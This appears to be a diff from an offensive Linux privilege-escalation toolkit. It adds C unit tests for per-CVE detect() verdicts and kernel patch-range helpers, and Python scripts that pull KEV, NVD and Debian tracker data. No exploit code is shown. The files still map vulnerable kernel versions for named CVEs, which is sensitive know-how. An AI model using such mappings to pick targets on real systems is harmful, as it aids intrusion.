+	/* pwnkit: fixed polkit 0.121 → OK */
+	run_one("pwnkit: polkit_version=0.121 → OK",
+		&pwnkit_module, &h_fixed_sudo,
+		SKELETONKEY_OK);
+
+	/* sudoedit_editor: vulnerable sudo 1.8.31 — but the test user
+	 * has no sudoers grant in the CI container, so find_sudoedit_target
+	 * fails and detect short-circuits to PRECOND_FAIL ("vulnerable
+	 * version present, but no sudoedit grant to abuse"). That's the
+	 * documented behaviour for a non-privileged user. */
+	run_one("sudoedit_editor: vuln version, no grant → PRECOND_FAIL",
+		&sudoedit_editor_module, &h_vuln_sudo,
+		SKELETONKEY_PRECOND_FAIL);
+
+	/* sudoedit_editor: fixed sudo 1.9.13p1 → OK regardless of grant */
+	run_one("sudoedit_editor: sudo_version=1.9.13p1 → OK",
+		&sudoedit_editor_module, &h_fixed_sudo,
+		SKELETONKEY_OK);
+
+	/* ── happy-path VULNERABLE coverage ──────────────────────────
+	 * Vulnerable kernel + userns allowed reaches the VULNERABLE
+	 * branch on modules whose detect() short-circuits there once
+	 * both gates are satisfied. Tests the affirmative verdict
+	 * path, not just precondition gates. */
+
+	run_one("nf_tables: vuln kernel 5.14 + userns ok → VULNERABLE",
+		&nf_tables_module, &h_kernel_5_14_userns_ok,
+		SKELETONKEY_VULNERABLE);
+
+	run_one("cls_route4: vuln kernel 5.14 + userns ok → VULNERABLE",
+		&cls_route4_module, &h_kernel_5_14_userns_ok,
+		SKELETONKEY_VULNERABLE);
+
+	run_one("nft_set_uaf: vuln kernel 5.14 + userns ok → VULNERABLE",
+		&nft_set_uaf_module, &h_kernel_5_14_userns_ok,
+		SKELETONKEY_VULNERABLE);
+
+	run_one("nft_fwd_dup: vuln kernel 5.14 + userns ok → VULNERABLE",
+		&nft_fwd_dup_module, &h_kernel_5_14_userns_ok,
+		SKELETONKEY_VULNERABLE);
+
+	run_one("nft_payload: vuln kernel 5.14 + userns ok → VULNERABLE",
+		&nft_payload_module, &h_kernel_5_14_userns_ok,
+		SKELETONKEY_VULNERABLE);
+
+	/* ── drift-entry boundary coverage ────────────────────────────
+	 * These tests guard the kernel_patched_from entries added by the
+	 * tools/refresh-kernel-ranges.py drift batch (commit 8de46e2).
+	 * Each entry has a "just-below" + "exact" pair so a regression
+	 * that drops or off-by-ones the entry is caught immediately. */
+
+	/* af_unix_gc {6, 4, 13} — Debian forky stable backport. The bug is
+	 * reachable as a plain unprivileged user (AF_UNIX needs no caps and
+	 * no userns), so 6.4.12 returns VULNERABLE rather than
+	 * PRECOND_FAIL — the just-below-boundary verdict the table
+	 * decides. */
+	struct skeletonkey_host h_af_unix_6_4_12 =
+		mk_host(h_kernel_5_14_no_userns, 6, 4, 12, "6.4.12-test");
+	run_one("af_unix_gc: 6.4.12 (one below new entry) → VULNERABLE",
+		&af_unix_gc_module, &h_af_unix_6_4_12,
+		SKELETONKEY_VULNERABLE);
+
+	struct skeletonkey_host h_af_unix_6_4_13 =
+		mk_host(h_kernel_5_14_no_userns, 6, 4, 13, "6.4.13-test");
+	run_one("af_unix_gc: 6.4.13 (exact new entry) → OK via patch table",
+		&af_unix_gc_module, &h_af_unix_6_4_13,
+		SKELETONKEY_OK);
+
+	/* vmwgfx {5, 10, 127} — Debian bullseye stable backport. Below the
+	 * entry, detect proceeds past the version check and fails the
+	 * AF_VSOCK / /dev/dri probe in CI → PRECOND_FAIL. At the exact
+	 * entry, kernel_range_is_patched short-circuits → OK. */
+	struct skeletonkey_host h_vmwgfx_5_10_127 =
+		mk_host(h_kernel_5_14_no_userns, 5, 10, 127, "5.10.127-test");
+	run_one("vmwgfx: 5.10.127 (exact new entry) → OK via patch table",
+		&vmwgfx_module, &h_vmwgfx_5_10_127,
+		SKELETONKEY_OK);
+
+	/* nft_set_uaf {5, 10, 179} (harmonised from 5.10.180) — exact entry
+	 * patches via table. */
+	struct skeletonkey_host h_nft_set_5_10_179 =
+		mk_host(h_kernel_5_14_no_userns, 5, 10, 179, "5.10.179-test");
+	run_one("nft_set_uaf: 5.10.179 (harmonised entry) → OK via patch table",
+		&nft_set_uaf_module, &h_nft_set_5_10_179,
+		SKELETONKEY_OK);
+
+	/* nft_set_uaf {6, 1, 27} (harmonised from 6.1.28) — exact entry
+	 * patches via table. */
+	struct skeletonkey_host h_nft_set_6_1_27 =
+		mk_host(h_kernel_5_14_no_userns, 6, 1, 27, "6.1.27-test");
+	run_one("nft_set_uaf: 6.1.27 (harmonised entry) → OK via patch table",
+		&nft_set_uaf_module, &h_nft_set_6_1_27,
+		SKELETONKEY_OK);
+
+	/* nft_payload {5, 10, 162} (harmonised from 5.10.163) — exact entry. */
+	struct skeletonkey_host h_nft_payload_5_10_162 =
+		mk_host(h_kernel_5_14_no_userns, 5, 10, 162, "5.10.162-test");
+	run_one("nft_payload: 5.10.162 (harmonised entry) → OK via patch table",
+		&nft_payload_module, &h_nft_payload_5_10_162,
+		SKELETONKEY_OK);
+
+	/* nf_tables {5, 10, 209} (harmonised from 5.10.210) — exact entry. */
+	struct skeletonkey_host h_nf_tables_5_10_209 =
+		mk_host(h_kernel_5_14_no_userns, 5, 10, 209, "5.10.209-test");
+	run_one("nf_tables: 5.10.209 (harmonised entry) → OK via patch table",
+		&nf_tables_module, &h_nf_tables_5_10_209,
+		SKELETONKEY_OK);
+
+	/* ── entrybleed: meltdown_mitigation passthrough ────────────────
+	 * entrybleed reads ctx->host->meltdown_mitigation (raw sysfs line)
+	 * instead of re-opening /sys/.../meltdown. Test the three branches:
+	 *   - empty string ("probe failed")          → conservative VULNERABLE
+	 *   - "Not affected" (Meltdown-immune CPU)   → OK
+	 *   - "Mitigation: PTI" (KPTI on, vulnerable) → VULNERABLE
+	 * The module is x86_64-only; on other arches the stub returns
+	 * PRECOND_FAIL regardless of meltdown status. We test the x86_64
+	 * branch via the synthetic host's `arch` field. */
+#if defined(__x86_64__) || defined(__amd64__)
+	struct skeletonkey_host h_entry_no_data = h_kernel_6_12;
+	h_entry_no_data.meltdown_mitigation[0] = '\0';
+	run_one("entrybleed: meltdown probe unread → conservative VULNERABLE",
+		&entrybleed_module, &h_entry_no_data,
+		SKELETONKEY_VULNERABLE);
+
+	struct skeletonkey_host h_entry_immune = h_kernel_6_12;
+	strcpy(h_entry_immune.meltdown_mitigation, "Not affected");
+	run_one("entrybleed: meltdown=Not affected (immune CPU) → OK",
+		&entrybleed_module, &h_entry_immune,
+		SKELETONKEY_OK);
+
+	struct skeletonkey_host h_entry_kpti = h_kernel_6_12;
+	strcpy(h_entry_kpti.meltdown_mitigation, "Mitigation: PTI");
+	run_one("entrybleed: meltdown=Mitigation: PTI → VULNERABLE",
+		&entrybleed_module, &h_entry_kpti,
+		SKELETONKEY_VULNERABLE);
+#else
+	/* On non-x86_64 dev / CI containers, the stubbed detect() returns
+	 * PRECOND_FAIL regardless of meltdown_mitigation contents. */
+	run_one("entrybleed: non-x86_64 arch → PRECOND_FAIL (stub)",
+		&entrybleed_module, &h_kernel_6_12,
+		SKELETONKEY_PRECOND_FAIL);
+#endif
+
+	/* ── coverage report ─────────────────────────────────────────
+	 * Iterate the runtime registry (populated by skeletonkey_register_*
+	 * calls in main()) and warn for any module that was not touched
+	 * by at least one run_one() row above. Doesn't fail CI — listing
+	 * is informational so we can grow coverage incrementally without
+	 * blocking the build. */
+	{
+		size_t n_reg = skeletonkey_module_count();
+		size_t missing = 0;
+		for (size_t i = 0; i < n_reg; i++) {
+			const struct skeletonkey_module *m =
+				skeletonkey_module_at(i);
+			if (!m) continue;
+			bool found = false;
+			for (size_t j = 0; j < g_tested_count; j++) {
+				if (strcmp(g_tested_modules[j], m->name) == 0) {
+					found = true; break;
+				}
+			}
+			if (!found) {
+				if (missing++ == 0) {
+					fprintf(stderr,
+					    "\n[i] coverage: module(s) without "
+					    "a direct detect() test row:\n");
+				}
+				fprintf(stderr, "       - %s\n", m->name);
+			}
+		}
+		if (missing) {
+			fprintf(stderr, "[i] coverage: total %zu module(s) "
+				"need test rows (registry has %zu, tests touched %zu)\n",
+				missing, n_reg, g_tested_count);
+		} else {
+			fprintf(stderr, "[i] coverage: every registered module "
+				"has at least one direct test row (%zu/%zu)\n",
+				g_tested_count, n_reg);
+		}
+	}
+#else
+	fprintf(stderr, "[i] non-Linux platform: detect() bodies are stubbed; "
+			"tests skipped (would tautologically pass).\n");
+#endif
+}
+
+int main(void)
+{
+	fprintf(stderr, "=== SKELETONKEY detect() unit tests ===\n\n");
+
+	/* Populate the runtime registry so the post-run coverage report
+	 * can iterate every module the main binary would. Same call used
+	 * by skeletonkey.c main(). */
+	skeletonkey_register_all_modules();
+
+	run_all();
+	fprintf(stderr, "\n=== RESULTS: %d passed, %d failed ===\n",
+		g_pass, g_fail);
+	return g_fail ? 1 : 0;
+}
@@ -0,0 +1,222 @@
+/*
+ * tests/test_kernel_range.c — unit tests for the central kernel
+ * version-comparison helpers in core/kernel_range.c and core/host.c.
+ *
+ * These helpers are the foundation of the host-fingerprint pattern:
+ * every module that gates on kernel version routes through
+ * skeletonkey_host_kernel_at_least(),
+ * skeletonkey_host_kernel_in_range(), or kernel_range_is_patched().
+ * A regression in any of them silently mis-classifies entire CVE
+ * families. The detect() integration tests in test_detect.c exercise
+ * these indirectly via real modules; this file pins them down with
+ * direct boundary-condition assertions so failures point at the right
+ * file.
+ *
+ * Cross-platform: pure logic, no Linux syscalls. Runs identically on
+ * macOS dev builds and Linux CI.
+ */
+
+#include "../core/kernel_range.h"
+#include "../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+static int g_pass = 0;
+static int g_fail = 0;
+
+#define EXPECT(name, cond) do {                                         \
+	if (cond) {                                                     \
+		printf("[+] PASS  %s\n", (name));                       \
+		g_pass++;                                               \
+	} else {                                                        \
+		fprintf(stderr, "[-] FAIL  %s\n", (name));              \
+		g_fail++;                                               \
+	}                                                               \
+} while (0)
+
+/* ── kernel_range_is_patched ────────────────────────────────────────── */
+
+static void test_kernel_range_is_patched(void)
+{
+	/* Common single-branch-plus-mainline table: backport on 5.15.42,
+	 * mainline fix at 5.17.0. */
+	static const struct kernel_patched_from pf_5_15_5_17[] = {
+		{5, 15, 42},
+		{5, 17,  0},
+	};
+	const struct kernel_range r1 = { pf_5_15_5_17, 2 };
+
+	struct kernel_version v;
+
+	v = (struct kernel_version){5, 15, 42, NULL};
+	EXPECT("range: exact backport boundary (5.15.42) → patched",
+	       kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){5, 15, 41, NULL};
+	EXPECT("range: one below backport (5.15.41) → vulnerable",
+	       !kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){5, 15, 100, NULL};
+	EXPECT("range: well above backport on same branch (5.15.100) → patched",
+	       kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){5, 17, 0, NULL};
+	EXPECT("range: mainline fix exact (5.17.0) → patched",
+	       kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){5, 16, 0, NULL};
+	EXPECT("range: between branches (5.16.0) → vulnerable",
+	       !kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){5, 14, 999, NULL};
+	EXPECT("range: branch below all entries (5.14.999) → vulnerable",
+	       !kernel_range_is_patched(&r1, &v));
+
+	v = (struct kernel_version){6, 12, 0, NULL};
+	EXPECT("range: newer mainline branch (6.12.0) → patched via inheritance",
+	       kernel_range_is_patched(&r1, &v));
+
+	/* Mainline-only entry — common pattern for a fresh CVE with no
+	 * stable backports yet. */
+	static const struct kernel_patched_from pf_7_0_only[] = {
+		{7, 0, 0},
+	};
+	const struct kernel_range r2 = { pf_7_0_only, 1 };
+
+	v = (struct kernel_version){6, 19, 99, NULL};
+	EXPECT("mainline-only: kernel below mainline (6.19.99) → vulnerable",
+	       !kernel_range_is_patched(&r2, &v));
+
+	v = (struct kernel_version){7, 0, 0, NULL};
+	EXPECT("mainline-only: at mainline (7.0.0) → patched",
+	       kernel_range_is_patched(&r2, &v));
+
+	v = (struct kernel_version){7, 5, 0, NULL};
+	EXPECT("mainline-only: above mainline (7.5.0) → patched",
+	       kernel_range_is_patched(&r2, &v));
+
+	/* Multi-LTS table mirroring real af_unix_gc layout. */
+	static const struct kernel_patched_from pf_multi[] = {
+		{4, 14, 326},
+		{4, 19, 295},
+		{5,  4, 257},
+		{5, 10, 197},
+		{5, 15, 130},
+		{6,  1,  51},
+		{6,  4,  13},
+		{6,  5,   0},
+	};
+	const struct kernel_range r3 = { pf_multi, 8 };
+
+	v = (struct kernel_version){5, 10, 196, NULL};
+	EXPECT("multi-LTS: 5.10.196 (one below backport) → vulnerable",
+	       !kernel_range_is_patched(&r3, &v));
+
+	v = (struct kernel_version){5, 10, 197, NULL};
+	EXPECT("multi-LTS: 5.10.197 (exact backport) → patched",
+	       kernel_range_is_patched(&r3, &v));
+
+	v = (struct kernel_version){6,  4, 12, NULL};
+	EXPECT("multi-LTS: 6.4.12 (just-added entry, below) → vulnerable",
+	       !kernel_range_is_patched(&r3, &v));
+
+	v = (struct kernel_version){6,  4, 13, NULL};
+	EXPECT("multi-LTS: 6.4.13 (just-added entry, exact) → patched",
+	       kernel_range_is_patched(&r3, &v));
+
+	v = (struct kernel_version){6,  2,  0, NULL};
+	EXPECT("multi-LTS: 6.2.0 (between LTS branches, no match) → vulnerable",
+	       !kernel_range_is_patched(&r3, &v));
+
+	v = (struct kernel_version){5,  8,  0, NULL};
+	EXPECT("multi-LTS: 5.8.0 (between LTS branches) → vulnerable",
+	       !kernel_range_is_patched(&r3, &v));
+
+	/* NULL safety. */
+	v = (struct kernel_version){5, 15, 42, NULL};
+	EXPECT("null safety: NULL range → false",
+	       !kernel_range_is_patched(NULL, &v));
+	EXPECT("null safety: NULL version → false",
+	       !kernel_range_is_patched(&r1, NULL));
+}
+
+/* ── skeletonkey_host_kernel_at_least ───────────────────────────────── */
+
+static void test_host_kernel_at_least(void)
+{
+	struct skeletonkey_host h = {0};
+	h.kernel.major = 6; h.kernel.minor = 12; h.kernel.patch = 5;
+
+	EXPECT("at_least: 6.12.5 ≥ 6.12.5 → true (exact)",
+	       skeletonkey_host_kernel_at_least(&h, 6, 12, 5));
+	EXPECT("at_least: 6.12.5 ≥ 6.12.4 → true",
+	       skeletonkey_host_kernel_at_least(&h, 6, 12, 4));
+	EXPECT("at_least: 6.12.5 ≥ 6.12.6 → false",
+	       !skeletonkey_host_kernel_at_least(&h, 6, 12, 6));
+	EXPECT("at_least: 6.12.5 ≥ 6.11.999 → true (lower minor)",
+	       skeletonkey_host_kernel_at_least(&h, 6, 11, 999));
+	EXPECT("at_least: 6.12.5 ≥ 6.13.0 → false (higher minor)",
+	       !skeletonkey_host_kernel_at_least(&h, 6, 13, 0));
+	EXPECT("at_least: 6.12.5 ≥ 5.0.0 → true (lower major)",
+	       skeletonkey_host_kernel_at_least(&h, 5, 0, 0));
+	EXPECT("at_least: 6.12.5 ≥ 7.0.0 → false (higher major)",
+	       !skeletonkey_host_kernel_at_least(&h, 7, 0, 0));
+
+	/* NULL host → false (don't crash). */
+	EXPECT("at_least: NULL host → false",
+	       !skeletonkey_host_kernel_at_least(NULL, 5, 0, 0));
+
+	/* Unpopulated host (major == 0) → false on any positive threshold:
+	 * a zero kernel version means we never probed; modules should
+	 * fail-safe by treating "unknown" as "below". */
+	struct skeletonkey_host h_zero = {0};
+	EXPECT("at_least: zeroed host (major=0) → false on any threshold",
+	       !skeletonkey_host_kernel_at_least(&h_zero, 5, 0, 0));
+}
+
+/* ── skeletonkey_host_kernel_in_range ───────────────────────────────── */
+
+static void test_host_kernel_in_range(void)
+{
+	struct skeletonkey_host h = {0};
+
+	/* Window [5.8.0, 5.17.0) — the classic mainline introduction/fix
+	 * pattern used by dirty_pipe and several others. */
+
+	h.kernel = (struct kernel_version){5, 8, 0, NULL};
+	EXPECT("in_range: 5.8.0 in [5.8.0, 5.17.0) → true (lo inclusive)",
+	       skeletonkey_host_kernel_in_range(&h, 5, 8, 0, 5, 17, 0));
+
+	h.kernel = (struct kernel_version){5, 16, 999, NULL};
+	EXPECT("in_range: 5.16.999 in [5.8.0, 5.17.0) → true (inside)",
+	       skeletonkey_host_kernel_in_range(&h, 5, 8, 0, 5, 17, 0));
+
+	h.kernel = (struct kernel_version){5, 17, 0, NULL};
+	EXPECT("in_range: 5.17.0 in [5.8.0, 5.17.0) → false (hi exclusive)",
+	       !skeletonkey_host_kernel_in_range(&h, 5, 8, 0, 5, 17, 0));
+
+	h.kernel = (struct kernel_version){5, 7, 999, NULL};
+	EXPECT("in_range: 5.7.999 below 5.8.0 → false",
+	       !skeletonkey_host_kernel_in_range(&h, 5, 8, 0, 5, 17, 0));
+
+	h.kernel = (struct kernel_version){6, 0, 0, NULL};
+	EXPECT("in_range: 6.0.0 above 5.17 → false",
+	       !skeletonkey_host_kernel_in_range(&h, 5, 8, 0, 5, 17, 0));
+
+	/* NULL host. */
+	EXPECT("in_range: NULL host → false",
+	       !skeletonkey_host_kernel_in_range(NULL, 5, 8, 0, 5, 17, 0));
+}
+
+int main(void)
+{
+	fprintf(stderr, "=== SKELETONKEY kernel_range unit tests ===\n\n");
+	test_kernel_range_is_patched();
+	test_host_kernel_at_least();
+	test_host_kernel_in_range();
+	fprintf(stderr, "\n=== RESULTS: %d passed, %d failed ===\n",
+		g_pass, g_fail);
+	return g_fail ? 1 : 0;
+}
@@ -0,0 +1,299 @@
+#!/usr/bin/env python3
+"""
+tools/refresh-cve-metadata.py — fetch CWE + KEV status for every CVE in the
+SKELETONKEY corpus from authoritative federal sources.
+
+Sources:
+  - CISA Known Exploited Vulnerabilities catalog
+    https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv
+    (authoritative for "is this exploited in the wild?")
+  - NVD CVE API 2.0
+    https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=...
+    (authoritative for CWE classification)
+
+The output is intentionally NOT auto-applied to module sources — drift
+between an external source and our embedded metadata should surface as
+a diff a human reviews. The tool produces:
+
+  docs/CVE_METADATA.json   machine-readable per-CVE record
+  docs/KEV_CROSSREF.md     human-readable KEV table
+
+Modules consume the JSON via copy-paste into their struct skeletonkey_module
+literal (attack_technique, cwe, in_kev, kev_date_added fields). The
+provenance comment in core/module.h points contributors back here.
+
+No API key required; the script throttles to NVD's anonymous 5-req/30s
+limit. ~3 minutes total for 26 CVEs.
+
+Usage:
+    tools/refresh-cve-metadata.py            # refresh + write outputs
+    tools/refresh-cve-metadata.py --check    # diff against committed JSON, exit 1 on drift
+
+Dependencies: stdlib only. Python 3.8+.
+"""
+
+import argparse
+import csv
+import io
+import json
+import os
+import sys
+import time
+import urllib.error
+import urllib.request
+from pathlib import Path
+
+REPO_ROOT = Path(__file__).resolve().parent.parent
+MODULES_DIR = REPO_ROOT / "modules"
+OUT_JSON = REPO_ROOT / "docs" / "CVE_METADATA.json"
+OUT_MD = REPO_ROOT / "docs" / "KEV_CROSSREF.md"
+OUT_C = REPO_ROOT / "core" / "cve_metadata.c"
+
+KEV_URL = "https://www.cisa.gov/sites/default/files/csv/known_exploited_vulnerabilities.csv"
+NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId={cve}"
+
+# Per NVD's anonymous rate limit: 5 requests per 30 seconds.
+NVD_DELAY_SECONDS = 7
+
+# Module → ATT&CK technique mapping. Almost all kernel/userspace LPEs
+# map to T1068 (Exploitation for Privilege Escalation). The two
+# exceptions are noted inline. This mapping is hand-curated; the
+# tool doesn't pull ATT&CK from any feed (MITRE doesn't publish a
+# clean CVE → technique CSV).
+ATTACK_MAPPING = {
+    # Default for every CVE not listed: T1068, no subtechnique.
+    "CVE-2022-0492": ("T1611", None),  # cgroup_release_agent — container escape
+    "CVE-2023-0458": ("T1082", None),  # entrybleed — kernel info leak, not LPE
+}
+
+
+def discover_cves() -> list[str]:
+    """Find every CVE-NNNN-NNNN id by scanning modules/<dir>/."""
+    cves = set()
+    for child in MODULES_DIR.iterdir():
+        if not child.is_dir():
+            continue
+        # Module dirs end in _cve_YYYY_NNNNN
+        parts = child.name.split("_cve_")
+        if len(parts) != 2:
+            continue
+        cve_tail = parts[1].replace("_", "-")
+        cves.add(f"CVE-{cve_tail}")
+    return sorted(cves)
+
+
+def fetch_kev_catalog() -> dict[str, str]:
+    """Return {cve_id: date_added_yyyy_mm_dd} from CISA's KEV CSV."""
+    print(f"[*] fetching CISA KEV catalog ({KEV_URL})", file=sys.stderr)
+    try:
+        with urllib.request.urlopen(KEV_URL, timeout=30) as r:
+            data = r.read().decode("utf-8", errors="replace")
+    except urllib.error.URLError as e:
+        print(f"[!] KEV fetch failed: {e}", file=sys.stderr)
+        sys.exit(1)
+    out: dict[str, str] = {}
+    reader = csv.DictReader(io.StringIO(data))
+    for row in reader:
+        cve = row.get("cveID", "").strip()
+        date = row.get("dateAdded", "").strip()
+        if cve:
+            out[cve] = date
+    print(f"[+] KEV catalog has {len(out)} entries", file=sys.stderr)
+    return out
+
+
+def fetch_nvd_cwe(cve: str) -> tuple[str | None, str | None]:
+    """Return (cwe_id, description) from NVD. Returns (None, None) on miss."""
+    url = NVD_URL.format(cve=cve)
+    req = urllib.request.Request(url, headers={"User-Agent": "skeletonkey-cve-metadata/1"})
+    try:
+        with urllib.request.urlopen(req, timeout=30) as r:
+            blob = json.loads(r.read().decode("utf-8"))
+    except urllib.error.HTTPError as e:
+        print(f"[!] NVD HTTP {e.code} for {cve}", file=sys.stderr)
+        return None, None
+    except (urllib.error.URLError, json.JSONDecodeError) as e:
+        print(f"[!] NVD parse error for {cve}: {e}", file=sys.stderr)
+        return None, None
+    vulns = blob.get("vulnerabilities") or []
+    if not vulns:
+        return None, None
+    cve_obj = vulns[0].get("cve", {})
+    # weaknesses: [{source, type, description: [{lang, value: "CWE-..."}]}]
+    for w in cve_obj.get("weaknesses", []) or []:
+        for d in w.get("description", []) or []:
+            v = d.get("value", "")
+            if v.startswith("CWE-"):
+                return v, None  # description not stored; CWE id alone is what we use
+    return None, None
+
+
+def attack_for_cve(cve: str) -> tuple[str, str | None]:
+    return ATTACK_MAPPING.get(cve, ("T1068", None))
+
+
+def short_module_name(cve: str) -> str:
+    """Find the directory under modules/ that ends with this CVE's tail."""
+    tail = cve.removeprefix("CVE-").replace("-", "_")
+    for child in MODULES_DIR.iterdir():
+        if child.is_dir() and child.name.endswith(f"_cve_{tail}"):
+            return child.name
+    return "?"
+
+
+def build_records(cves: list[str], kev: dict[str, str]) -> list[dict]:
+    records = []
+    for i, cve in enumerate(cves, 1):
+        print(f"[*] [{i:2d}/{len(cves)}] {cve}: NVD lookup", file=sys.stderr)
+        cwe, _ = fetch_nvd_cwe(cve)
+        tech, subtech = attack_for_cve(cve)
+        in_kev = cve in kev
+        rec = {
+            "cve": cve,
+            "module_dir": short_module_name(cve),
+            "cwe": cwe,
+            "attack_technique": tech,
+            "attack_subtechnique": subtech,
+            "in_kev": in_kev,
+            "kev_date_added": kev.get(cve, ""),
+        }
+        records.append(rec)
+        # Throttle NVD requests
+        if i < len(cves):
+            time.sleep(NVD_DELAY_SECONDS)
+    return records
+
+
+def _c_str(s: str | None) -> str:
+    """Render a Python str|None as a C string literal or NULL."""
+    if s is None:
+        return "NULL"
+    # only safe chars in our domain (CVE-/CWE-/T#### / dates) so no escaping needed
+    return f'"{s}"'
+
+
+def write_c_table(records: list[dict]) -> None:
+    """Generate core/cve_metadata.c from the JSON records."""
+    lines = [
+        "/*",
+        " * SKELETONKEY — CVE metadata table",
+        " *",
+        " * AUTO-GENERATED by tools/refresh-cve-metadata.py from",
+        " * docs/CVE_METADATA.json. Do not hand-edit; rerun the script.",
+        " * Sources: CISA KEV catalog + NVD CVE API 2.0.",
+        " */",
+        "",
+        '#include "cve_metadata.h"',
+        "",
+        "#include <stddef.h>",
+        "#include <string.h>",
+        "",
+        "const struct cve_metadata cve_metadata_table[] = {",
+    ]
+    for r in records:
+        lines.append("    {")
+        lines.append(f"        .cve                 = {_c_str(r['cve'])},")
+        lines.append(f"        .cwe                 = {_c_str(r['cwe'])},")
+        lines.append(f"        .attack_technique    = {_c_str(r['attack_technique'])},")
+        lines.append(f"        .attack_subtechnique = {_c_str(r['attack_subtechnique'])},")
+        lines.append(f"        .in_kev              = {'true' if r['in_kev'] else 'false'},")
+        lines.append(f"        .kev_date_added      = {_c_str(r['kev_date_added'])},")
+        lines.append("    },")
+    lines += [
+        "};",
+        "",
+        "const size_t cve_metadata_table_len =",
+        "    sizeof(cve_metadata_table) / sizeof(cve_metadata_table[0]);",
+        "",
+        "const struct cve_metadata *cve_metadata_lookup(const char *cve)",
+        "{",
+        "    if (!cve) return NULL;",
+        "    for (size_t i = 0; i < cve_metadata_table_len; i++) {",
+        "        if (strcmp(cve_metadata_table[i].cve, cve) == 0)",
+        "            return &cve_metadata_table[i];",
+        "    }",
+        "    return NULL;",
+        "}",
+        "",
+    ]
+    OUT_C.write_text("\n".join(lines))
+    print(f"[+] wrote {OUT_C.relative_to(REPO_ROOT)}", file=sys.stderr)
+
+
+def write_outputs(records: list[dict]) -> None:
+    OUT_JSON.parent.mkdir(parents=True, exist_ok=True)
+    OUT_JSON.write_text(json.dumps(records, indent=2) + "\n")
+    print(f"[+] wrote {OUT_JSON.relative_to(REPO_ROOT)}", file=sys.stderr)
+    write_c_table(records)
+
+    # KEV cross-reference table
+    in_kev = [r for r in records if r["in_kev"]]
+    not_in_kev = [r for r in records if not r["in_kev"]]
+    lines = [
+        "# CISA KEV Cross-Reference",
+        "",
+        "Which SKELETONKEY modules cover CVEs that CISA has observed exploited",
+        "in the wild per the Known Exploited Vulnerabilities catalog.",
+        "Refreshed via `tools/refresh-cve-metadata.py`.",
+        "",
+        f"**{len(in_kev)} of {len(records)} modules cover KEV-listed CVEs.**",
+        "",
+        "## In KEV (prioritize patching)",
+        "",
+        "| CVE | Date added to KEV | CWE | Module |",
+        "| --- | --- | --- | --- |",
+    ]
+    for r in sorted(in_kev, key=lambda r: r["kev_date_added"]):
+        lines.append(
+            f"| {r['cve']} | {r['kev_date_added']} | {r['cwe'] or '?'} | `{r['module_dir']}` |"
+        )
+    lines += [
+        "",
+        "## Not in KEV",
+        "",
+        "Not observed exploited per CISA — but several have public PoC code",
+        "and are technically reachable. \"Not in KEV\" is not the same as",
+        "\"safe to ignore\".",
+        "",
+        "| CVE | CWE | Module |",
+        "| --- | --- | --- |",
+    ]
+    for r in sorted(not_in_kev, key=lambda r: r["cve"]):
+        lines.append(f"| {r['cve']} | {r['cwe'] or '?'} | `{r['module_dir']}` |")
+    lines.append("")
+    OUT_MD.write_text("\n".join(lines))
+    print(f"[+] wrote {OUT_MD.relative_to(REPO_ROOT)}", file=sys.stderr)
+
+
+def check_drift() -> int:
+    """Exit 1 if the committed JSON differs from a fresh fetch."""
+    if not OUT_JSON.exists():
+        print(f"[!] no committed {OUT_JSON.name} — run without --check first", file=sys.stderr)
+        return 1
+    committed = json.loads(OUT_JSON.read_text())
+    fresh = build_records(discover_cves(), fetch_kev_catalog())
+    if committed == fresh:
+        print("[+] CVE_METADATA.json is current", file=sys.stderr)
+        return 0
+    print("[!] CVE_METADATA.json drifted — refresh via "
+          "`tools/refresh-cve-metadata.py`", file=sys.stderr)
+    return 1
+
+
+def main() -> int:
+    ap = argparse.ArgumentParser(description=__doc__.splitlines()[1])
+    ap.add_argument("--check", action="store_true",
+                    help="diff against committed metadata; exit 1 on drift")
+    args = ap.parse_args()
+    if args.check:
+        return check_drift()
+    cves = discover_cves()
+    print(f"[*] {len(cves)} CVE(s) in corpus", file=sys.stderr)
+    kev = fetch_kev_catalog()
+    records = build_records(cves, kev)
+    write_outputs(records)
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,346 @@
+#!/usr/bin/env python3
+"""
+tools/refresh-kernel-ranges.py — Detect drift between each module's
+kernel_patched_from table and Debian's security-tracker data.
+
+The repo's no-fabrication rule (CVES.md) means every kernel_range
+threshold has to come from a real, citeable source. Debian's
+security tracker is the most reliable per-CVE backport list — it's
+machine-readable and updated continuously by the Debian security
+team. This script:
+
+  1. Fetches https://security-tracker.debian.org/tracker/data/json
+     (cached at /tmp/skeletonkey-debian-tracker.json, 12h TTL).
+  2. Scans every modules/*/skeletonkey_modules.c for
+     `kernel_patched_from <name>[] = { {M, m, p}, ... };` arrays and
+     their corresponding `.cve = "CVE-..."` entry.
+  3. For each module, compares the table against Debian's tracked
+     fixed-versions for that CVE.
+  4. Reports:
+       missing branch       — Debian has a fix at X.Y.Z; our table
+                              has no X.Y entry. The module's detect()
+                              would say VULNERABLE on a Debian host
+                              that's actually patched.
+       too-tight threshold  — Our X.Y.Z is HIGHER than Debian's fix
+                              version; our module would call a
+                              fixed host vulnerable. False-positive.
+       info (more conservative) — Our threshold is LOWER than
+                              Debian's; we accept earlier kernels
+                              as patched. Could be intentional or
+                              could mean we have stale data.
+
+Usage:
+    tools/refresh-kernel-ranges.py            # human report
+    tools/refresh-kernel-ranges.py --json     # machine-readable
+    tools/refresh-kernel-ranges.py --patch    # propose C-source edits
+    tools/refresh-kernel-ranges.py --refresh  # force re-fetch
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import re
+import sys
+import time
+import urllib.request
+
+CACHE = "/tmp/skeletonkey-debian-tracker.json"
+TRACKER_URL = "https://security-tracker.debian.org/tracker/data/json"
+CACHE_TTL_SEC = 12 * 3600
+
+
+# ── tracker fetch ────────────────────────────────────────────────────
+
+def fetch_tracker(force_refresh: bool = False) -> dict:
+    """Return the parsed Debian tracker JSON. Cached at /tmp with 12h TTL."""
+    if not force_refresh and os.path.exists(CACHE):
+        age = time.time() - os.stat(CACHE).st_mtime
+        if age < CACHE_TTL_SEC:
